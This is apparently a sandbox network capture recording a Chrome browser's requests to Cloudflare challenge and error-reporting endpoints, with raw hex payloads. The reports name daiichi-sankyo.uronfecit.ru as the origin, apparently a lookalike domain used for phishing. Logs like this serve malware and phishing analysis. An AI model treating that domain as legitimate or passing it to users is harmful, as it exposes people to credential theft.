                                        2025-01-07 08:16:24 UTC1369INData Raw: 56 4d 66 30 32 50 6a 48 46 51 62 34 52 76 62 4a 61 57 6a 5a 4e 71 69 33 57 57 6a 59 43 6c 63 70 79 46 71 31 36 61 64 6e 70 6e 72 70 75 75 63 6f 71 42 64 35 47 50 65 71 75 74 71 37 36 67 75 71 71 4b 76 62 71 51 6e 70 79 68 6f 73 58 47 67 72 32 6a 6f 61 75 67 77 63 61 47 7a 4d 33 4e 69 74 44 5a 30 5a 61 2b 31 37 69 58 73 63 48 4d 6f 4c 61 63 34 73 43 67 33 4e 65 6e 6e 2b 48 59 70 2b 47 71 36 64 48 4f 30 2b 76 41 35 4d 4c 4c 7a 37 58 4d 30 2b 33 70 37 76 54 79 39 4e 6e 45 39 4e 30 48 43 73 66 45 37 4d 6a 34 35 41 6f 49 39 64 50 67 31 65 76 6d 30 51 51 62 44 76 4c 30 38 52 4c 73 47 42 37 66 48 67 4d 57 34 76 4d 43 4a 42 59 4b 48 50 6b 4b 45 65 55 4f 45 68 6a 70 4f 43 51 6f 37 54 77 6f 43 76 46 41 4c 42 62 31 52 44 41 65 2b 55 67 7a 54 50 31 4d 4e 77 6b 43 55
                                        Data Ascii: VMf02PjHFQb4RvbJaWjZNqi3WWjYClcpyFq16adnpnrpuucoqBd5GPequtq76guqqKvbqQnpyhosXGgr2joaugwcaGzM3NitDZ0Za+17iXscHMoLac4sCg3Nenn+HYp+Gq6dHO0+vA5MLLz7XM0+3p7vTy9NnE9N0HCsfE7Mj45AoI9dPg1evm0QQbDvL08RLsGB7fHgMW4vMCJBYKHPkKEeUOEhjpOCQo7TwoCvFALBb1RDAe+UgzTP1MNwkCU
                                        2025-01-07 08:16:24 UTC1369INData Raw: 51 68 59 32 5a 5a 6e 47 66 64 6c 61 51 59 6f 42 78 6c 36 64 6c 58 34 57 6d 6f 59 47 43 5a 71 65 50 65 33 36 46 66 48 53 45 69 61 61 72 69 49 32 71 6d 59 79 52 72 6f 32 51 6c 61 2f 45 6f 5a 61 47 6e 49 61 59 6f 71 6d 36 6a 73 47 72 79 71 79 6e 71 74 4c 41 78 71 61 75 74 61 61 76 74 62 79 32 71 62 69 61 77 72 6d 39 6f 62 61 31 76 36 54 67 75 63 4f 72 35 4c 33 48 72 75 6a 42 79 37 54 73 78 63 2f 32 74 2f 76 76 7a 50 7a 58 74 50 4d 44 42 41 4c 47 42 65 44 5a 31 51 73 4d 42 41 76 71 34 78 45 47 35 4e 2f 69 38 76 66 6a 47 65 50 39 33 52 4d 42 2b 50 4c 55 34 78 59 51 48 67 44 61 48 77 72 2b 4c 43 55 6f 47 77 49 54 36 78 33 72 49 44 67 53 37 67 34 33 4d 2f 6b 63 2f 50 55 4a 47 53 77 57 45 69 4d 61 50 42 51 55 48 44 51 58 4b 79 51 36 4c 41 73 30 54 44 51 6d 4f 45
                                        Data Ascii: QhY2ZZnGfdlaQYoBxl6dlX4WmoYGCZqePe36FfHSEiaariI2qmYyRro2Qla/EoZaGnIaYoqm6jsGryqynqtLAxqautaavtby2qbiawrm9oba1v6TgucOr5L3HrujBy7Tsxc/2t/vvzPzXtPMDBALGBeDZ1QsMBAvq4xEG5N/i8vfjGeP93RMB+PLU4xYQHgDaHwr+LCUoGwIT6x3rIDgS7g43M/kc/PUJGSwWEiMaPBQUHDQXKyQ6LAs0TDQmOE
                                        2025-01-07 08:16:24 UTC1369INData Raw: 61 58 69 42 6d 6d 78 38 68 5a 35 76 67 49 6d 68 5a 58 6d 42 6d 36 6d 74 6f 34 35 76 6a 58 4f 32 6a 49 71 77 69 62 68 35 6a 36 33 41 6e 6f 71 30 6a 71 4b 4f 67 5a 4b 6d 6b 6f 6d 57 71 70 62 4d 6d 71 36 61 69 71 4f 2f 31 62 2f 41 77 61 36 53 6d 4c 7a 4b 30 38 75 72 71 38 71 78 6f 37 47 36 6f 71 69 39 36 75 50 42 35 4b 44 66 36 75 6a 79 38 2b 66 66 77 4f 61 79 78 2f 62 35 79 4f 62 51 2b 75 32 7a 76 4f 7a 32 35 63 4c 52 39 64 4c 6c 42 63 72 75 41 77 38 4b 41 4f 54 65 30 64 44 57 36 4f 51 55 45 51 6e 5a 33 65 67 66 31 68 49 68 49 2b 37 67 4b 42 38 54 4b 43 48 31 35 68 7a 35 4b 67 44 74 38 69 6f 76 4a 51 55 33 4e 54 41 73 47 43 58 32 39 54 41 63 49 7a 45 5a 49 30 55 54 48 6a 6b 64 53 78 39 46 4b 53 6f 37 4f 55 59 6e 51 78 39 45 4b 69 46 4a 55 43 67 6c 54 56 51
                                        Data Ascii: aXiBmmx8hZ5vgImhZXmBm6mto45vjXO2jIqwibh5j63Anoq0jqKOgZKmkomWqpbMmq6aiqO/1b/Awa6SmLzK08urq8qxo7G6oqi96uPB5KDf6ujy8+ffwOayx/b5yObQ+u2zvOz25cLR9dLlBcruAw8KAOTe0dDW6OQUEQnZ3egf1hIhI+7gKB8TKCH15hz5KgDt8iovJQU3NTAsGCX29TAcIzEZI0UTHjkdSx9FKSo7OUYnQx9EKiFJUCglTVQ
                                        2025-01-07 08:16:24 UTC1369INData Raw: 36 65 53 6e 4a 75 41 6d 36 78 6f 59 4b 57 4d 5a 36 65 55 66 34 2b 66 73 4b 6d 31 72 62 57 4d 65 58 36 31 76 35 71 59 77 73 43 41 74 34 53 39 74 62 4f 31 71 37 7a 4c 71 71 2b 64 6e 70 79 31 6c 63 61 6a 71 63 54 43 72 37 4c 63 71 72 4c 59 72 4c 33 4f 7a 4e 6d 75 31 72 4c 6d 31 73 66 72 6e 2b 36 68 79 63 7a 6c 77 76 48 46 72 65 2f 71 31 72 66 30 75 66 37 49 41 62 2f 78 38 66 54 52 38 76 62 53 33 64 37 37 31 73 77 4e 2f 64 72 37 43 51 4c 65 41 66 59 47 34 67 58 6d 38 42 48 77 44 2f 62 5a 39 52 4d 56 33 76 76 78 39 53 50 77 41 66 6e 6e 44 66 33 32 4c 2b 76 78 41 68 51 47 4d 68 4d 52 47 53 30 49 48 41 63 37 48 52 6b 65 48 78 41 74 49 52 38 48 4f 67 4d 41 43 67 59 58 42 6b 38 5a 54 79 78 41 4e 45 45 30 4c 44 63 35 57 56 41 6c 4c 46 78 64 55 54 4a 64 54 6c 51 75
                                        Data Ascii: 6eSnJuAm6xoYKWMZ6eUf4+fsKm1rbWMeX61v5qYwsCAt4S9tbO1q7zLqq+dnpy1lcajqcTCr7LcqrLYrL3OzNmu1rLm1sfrn+6hyczlwvHFre/q1rf0uf7IAb/x8fTR8vbS3d771swN/dr7CQLeAfYG4gXm8BHwD/bZ9RMV3vvx9SPwAfnnDf32L+vxAhQGMhMRGS0IHAc7HRkeHxAtIR8HOgMACgYXBk8ZTyxANEE0LDc5WVAlLFxdUTJdTlQu
                                        2025-01-07 08:16:24 UTC1369INData Raw: 31 74 6e 70 42 2b 6b 6f 43 67 70 61 31 7a 73 4b 39 31 62 4b 36 74 65 48 71 33 74 5a 46 30 74 62 71 6c 67 38 43 2f 73 61 50 44 74 49 6e 43 71 4d 57 4f 75 72 32 31 70 71 6a 4b 79 72 6d 59 71 74 47 5a 72 4c 6a 57 6e 5a 76 51 7a 4e 7a 5a 31 39 37 54 32 72 2f 6b 70 62 66 50 30 4c 37 48 34 65 65 75 38 74 62 5a 37 4d 2f 56 32 50 44 50 32 65 67 43 34 64 2f 31 34 4c 33 66 32 77 4c 69 2b 50 66 4c 37 65 44 65 2f 51 7a 37 35 74 44 57 36 4f 54 56 32 68 49 63 39 76 41 66 48 64 77 55 34 42 6f 53 45 42 6b 68 39 43 63 6d 43 2b 4d 6f 49 43 41 62 38 43 59 69 45 41 58 32 2b 50 67 48 2b 69 67 39 48 2f 45 62 43 2f 78 46 52 51 50 38 4d 30 6b 35 4f 69 59 49 46 6b 30 36 4c 30 41 6f 4b 55 51 6d 50 79 6c 4b 4d 44 74 5a 53 45 6b 79 46 68 77 31 57 46 42 63 50 31 52 68 57 6b 42 65 61
                                        Data Ascii: 1tnpB+koCgpa1zsK91bK6teHq3tZF0tbqlg8C/saPDtInCqMWOur21pqjKyrmYqtGZrLjWnZvQzNzZ197T2r/kpbfP0L7H4eeu8tbZ7M/V2PDP2egC4d/14L3f2wLi+PfL7eDe/Qz75tDW6OTV2hIc9vAfHdwU4BoSEBkh9CcmC+MoICAb8CYiEAX2+PgH+ig9H/EbC/xFRQP8M0k5OiYIFk06L0AoKUQmPylKMDtZSEkyFhw1WFBcP1RhWkBea
                                        2025-01-07 08:16:24 UTC1369INData Raw: 70 62 70 61 7a 6b 48 4f 57 6d 33 71 38 65 48 53 32 71 6f 47 52 6f 48 79 61 6c 61 4b 43 76 4b 61 36 70 36 53 49 70 35 71 5a 6f 4b 58 43 78 36 53 70 78 72 57 6f 72 63 71 6d 75 61 36 65 79 70 36 77 75 72 53 6b 74 4f 54 54 31 71 72 64 78 2b 62 49 30 4d 6e 6f 76 66 4c 56 37 73 44 51 32 66 4c 44 31 4e 33 31 75 63 33 56 37 2f 30 43 39 2b 4c 44 34 63 63 4c 34 4e 34 46 32 2f 34 4f 36 41 44 63 36 2b 51 42 39 65 38 4b 31 2b 67 50 33 42 73 64 32 67 33 61 48 41 55 57 38 76 6e 77 46 50 6a 39 47 2f 6e 38 41 68 77 78 44 67 50 79 43 66 49 46 44 78 59 6e 2b 69 34 59 4e 78 6b 35 2f 6a 48 36 2f 69 51 2b 4f 42 6b 69 51 52 56 4c 4c 6b 63 59 4b 54 4a 4b 44 69 49 71 52 46 4a 57 54 44 63 59 4e 68 78 66 4e 54 4e 5a 4c 31 56 44 4c 31 55 7a 52 7a 4e 64 4e 30 73 33 4b 6a 74 50 4f 7a
                                        Data Ascii: pbpazkHOWm3q8eHS2qoGRoHyalaKCvKa6p6SIp5qZoKXCx6SpxrWorcqmua6eyp6wurSktOTT1qrdx+bI0MnovfLV7sDQ2fLD1N31uc3V7/0C9+LD4ccL4N4F2/4O6ADc6+QB9e8K1+gP3Bsd2g3aHAUW8vnwFPj9G/n8AhwxDgPyCfIFDxYn+i4YNxk5/jH6/iQ+OBkiQRVLLkcYKTJKDiIqRFJWTDcYNhxfNTNZL1VDL1UzRzNdN0s3KjtPOz
                                        2025-01-07 08:16:24 UTC1369INData Raw: 71 48 57 54 6d 4a 75 32 74 4b 32 66 6e 4c 79 41 78 37 36 30 65 34 69 6d 68 73 65 45 67 59 6d 52 76 36 71 53 71 72 58 46 6b 4a 6d 78 78 39 7a 4d 6c 4e 69 58 33 2b 44 4d 34 36 54 43 30 38 43 6a 77 62 6a 6d 6e 2b 72 46 72 64 44 4a 78 36 7a 68 77 64 61 76 75 62 58 77 74 64 44 4e 74 62 71 33 39 39 72 51 32 4c 33 48 33 2b 50 70 36 50 33 6f 44 65 66 6a 42 4e 37 53 41 41 6a 69 31 67 51 4a 2b 73 33 76 2f 64 58 32 49 64 37 67 44 2f 58 6c 46 77 6b 42 2b 65 63 55 4b 78 63 71 42 50 6b 71 2b 76 77 53 4e 42 41 34 45 7a 44 77 38 67 59 4f 4f 53 45 79 4f 68 51 5a 4d 2f 34 53 4a 51 41 47 53 77 72 2b 51 68 63 64 42 78 70 41 42 68 4d 75 53 7a 6b 33 51 78 67 30 45 31 30 61 56 6a 73 7a 47 31 34 65 49 6c 34 79 57 6b 74 62 52 57 49 37 53 57 67 75 5a 31 78 52 4c 45 74 6b 54 6a 4e
                                        Data Ascii: qHWTmJu2tK2fnLyAx760e4imhseEgYmRv6qSqrXFkJmxx9zMlNiX3+DM46TC08Cjwbjmn+rFrdDJx6zhwdavubXwtdDNtbq399rQ2L3H3+Pp6P3oDefjBN7SAAji1gQJ+s3v/dX2Id7gD/XlFwkB+ecUKxcqBPkq+vwSNBA4EzDw8gYOOSEyOhQZM/4SJQAGSwr+QhcdBxpABhMuSzk3Qxg0E10aVjszG14eIl4yWktbRWI7SWguZ1xRLEtkTjN
                                        2025-01-07 08:16:24 UTC1369INData Raw: 6f 75 76 70 4c 43 6a 6d 59 53 30 6e 63 65 5a 67 36 79 2b 79 63 2f 48 7a 71 71 52 74 4b 48 42 6d 4e 65 78 78 4b 75 5a 6e 72 62 66 71 72 54 69 34 4e 6d 63 70 4e 32 2f 30 38 76 49 78 4d 6a 70 7a 39 37 72 34 75 44 67 35 4d 76 4a 39 66 62 52 75 64 7a 56 32 4d 72 41 77 4d 4b 36 7a 39 44 41 38 77 72 55 77 74 33 68 43 65 37 47 44 50 48 62 79 68 44 31 34 63 34 55 2b 65 62 53 47 50 7a 65 31 68 77 42 34 39 6f 67 42 64 6e 65 4a 41 6e 68 34 69 67 4e 36 75 6e 6a 44 51 76 75 46 43 34 57 49 52 41 6f 39 50 77 64 2b 78 6f 41 41 42 67 36 41 41 4d 59 41 7a 64 4c 4b 69 78 4c 42 43 63 77 4b 51 77 2f 4e 43 30 51 4f 44 4d 34 4a 42 49 6b 50 68 34 62 48 45 46 66 57 69 42 6c 4a 44 5a 42 56 69 64 73 4f 31 30 70 4a 57 64 62 52 69 6c 56 50 33 49 32 5a 6d 34 7a 61 33 31 4a 64 30 30 39
                                        Data Ascii: ouvpLCjmYS0nceZg6y+yc/HzqqRtKHBmNexxKuZnrbfqrTi4NmcpN2/08vIxMjpz97r4uDg5MvJ9fbRudzV2MrAwMK6z9DA8wrUwt3hCe7GDPHbyhD14c4U+ebSGPze1hwB49ogBdneJAnh4igN6unjDQvuFC4WIRAo9Pwd+xoAABg6AAMYAzdLKixLBCcwKQw/NC0QODM4JBIkPh4bHEFfWiBlJDZBVidsO10pJWdbRilVP3I2Zm4za31Jd009


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.44976535.190.80.14433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:25 UTC544OUTOPTIONS /report/v4?s=HShHOmDE2cG2wPAdvpVo1Z2m6SGLFNB%2BhtkPKnuiYY4QBF2ZCkRSUDMaxN3NFYQxn4FZHdiMZK8OBo1us8fgfBdpVmt7vrdVfRuNdgZ01%2BbePtjkxpHJmd10mOxhUQ%3D%3D HTTP/1.1
                                        Host: a.nel.cloudflare.com
                                        Connection: keep-alive
                                        Origin: https://daiichi-sankyo.uronfecit.ru
                                        Access-Control-Request-Method: POST
                                        Access-Control-Request-Headers: content-type
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:25 UTC336INHTTP/1.1 200 OK
                                        Content-Length: 0
                                        access-control-max-age: 86400
                                        access-control-allow-methods: OPTIONS, POST
                                        access-control-allow-origin: *
                                        access-control-allow-headers: content-length, content-type
                                        date: Tue, 07 Jan 2025 08:16:24 GMT
                                        Via: 1.1 google
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.449767104.18.94.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:25 UTC597OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/21577938:1736234858:tqilWgxS_EsW8SSjchFDEnaIce_aADwik1qCA_CqtGY/8fe2815f5f9a43d9/xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:25 UTC379INHTTP/1.1 404 Not Found
                                        Date: Tue, 07 Jan 2025 08:16:25 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cf-chl-out: GyHbvmaYlV9ikZC/a3SG7dX6xartvyKKygY=$5vCi/lSzLCBUypiX
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8fe281702b0d43b1-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:25 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.449768104.18.95.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:25 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fe2815f5f9a43d9/1736237784602/358c44a4c49bb720c6effbedb10fe6a8c3f4bb3a9a27837586d7500655e91efe/zA-xGfAHtVaKXPL HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Cache-Control: max-age=0
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:25 UTC143INHTTP/1.1 401 Unauthorized
                                        Date: Tue, 07 Jan 2025 08:16:25 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 1
                                        Connection: close
                                        2025-01-07 08:16:25 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4e 59 78 45 70 4d 53 62 74 79 44 47 37 5f 76 74 73 51 5f 6d 71 4d 50 30 75 7a 71 61 4a 34 4e 31 68 74 64 51 42 6c 58 70 48 76 34 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gNYxEpMSbtyDG7_vtsQ_mqMP0uzqaJ4N1htdQBlXpHv4AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                        2025-01-07 08:16:25 UTC1INData Raw: 4a
                                        Data Ascii: J


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.44976935.190.80.14433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:25 UTC474OUTPOST /report/v4?s=HShHOmDE2cG2wPAdvpVo1Z2m6SGLFNB%2BhtkPKnuiYY4QBF2ZCkRSUDMaxN3NFYQxn4FZHdiMZK8OBo1us8fgfBdpVmt7vrdVfRuNdgZ01%2BbePtjkxpHJmd10mOxhUQ%3D%3D HTTP/1.1
                                        Host: a.nel.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 452
                                        Content-Type: application/reports+json
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:25 UTC452OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 39 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 61 69 69 63 68 69 2d 73 61 6e 6b 79 6f 2e 75 72 6f 6e 66 65 63 69 74 2e 72 75 2f 48 6c 6e 7a 36 32 6b 4b 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65
                                        Data Ascii: [{"age":0,"body":{"elapsed_time":797,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://daiichi-sankyo.uronfecit.ru/Hlnz62kK/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"ne
                                        2025-01-07 08:16:25 UTC168INHTTP/1.1 200 OK
                                        Content-Length: 0
                                        date: Tue, 07 Jan 2025 08:16:25 GMT
                                        Via: 1.1 google
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.449771104.18.95.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:26 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe2815f5f9a43d9/1736237784604/1Z4TLpLdSCaC96A HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:26 UTC200INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:26 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        Server: cloudflare
                                        CF-RAY: 8fe28177afb90f65-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:26 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 09 08 02 00 00 00 aa 81 0b d6 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.449772104.18.94.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:27 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe2815f5f9a43d9/1736237784604/1Z4TLpLdSCaC96A HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:27 UTC200INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 08:16:27 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        Server: cloudflare
                                        CF-RAY: 8fe2817c9ac942ad-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 08:16:27 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 09 08 02 00 00 00 aa 81 0b d6 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.449773104.18.95.414433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:28 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/21577938:1736234858:tqilWgxS_EsW8SSjchFDEnaIce_aADwik1qCA_CqtGY/8fe2815f5f9a43d9/xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 32554
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: xqY4vsu_uMJnKULfSeY7OBXe1Phd2U0vrqPqHZPNU9Q-1736237782-1.1.1.1-c4e4qIVeRQjxaYd3.smCVhY9.WIbKOac0Skj_I4LynVoLFp.72mF6XFwk9lqQ8AE
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/wonk3/0x4AAAAAAA2J__x0qrFVzzde/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:28 UTC16384OUTData Raw: 76 5f 38 66 65 32 38 31 35 66 35 66 39 61 34 33 64 39 3d 4b 76 79 65 39 61 33 66 2d 61 2d 47 79 47 70 33 42 67 79 65 53 76 62 43 33 71 31 32 31 49 65 33 79 47 43 31 77 65 33 4d 31 66 31 6b 6d 65 48 34 76 47 71 70 79 31 4b 33 42 41 53 2d 61 53 7a 42 79 31 32 77 61 37 31 59 4a 4d 65 35 31 34 41 47 72 31 41 41 31 70 50 48 53 70 4d 33 67 64 4c 50 77 31 46 72 54 48 2d 31 37 57 42 41 61 54 31 53 32 30 32 67 35 31 70 4a 4c 42 31 70 63 71 69 72 50 50 67 4d 47 6f 79 31 47 59 61 31 57 65 62 70 31 67 24 36 49 31 48 4c 5a 63 68 48 31 36 58 56 41 24 54 61 77 30 53 39 61 79 73 47 38 66 35 47 49 48 63 77 2d 4a 61 6b 6d 31 31 4e 49 31 31 57 39 5a 68 48 61 78 65 41 48 48 71 67 70 6c 37 4a 66 38 79 33 4b 48 75 72 52 59 42 42 6f 7a 42 68 66 2d 32 6b 30 52 75 78 38 73 42 54
                                        Data Ascii: v_8fe2815f5f9a43d9=Kvye9a3f-a-GyGp3BgyeSvbC3q121Ie3yGC1we3M1f1kmeH4vGqpy1K3BAS-aSzBy12wa71YJMe514AGr1AA1pPHSpM3gdLPw1FrTH-17WBAaT1S202g51pJLB1pcqirPPgMGoy1GYa1Webp1g$6I1HLZchH16XVA$Taw0S9aysG8f5GIHcw-Jakm11NI11W9ZhHaxeAHHqgpl7Jf8y3KHurRYBBozBhf-2k0Rux8sBT
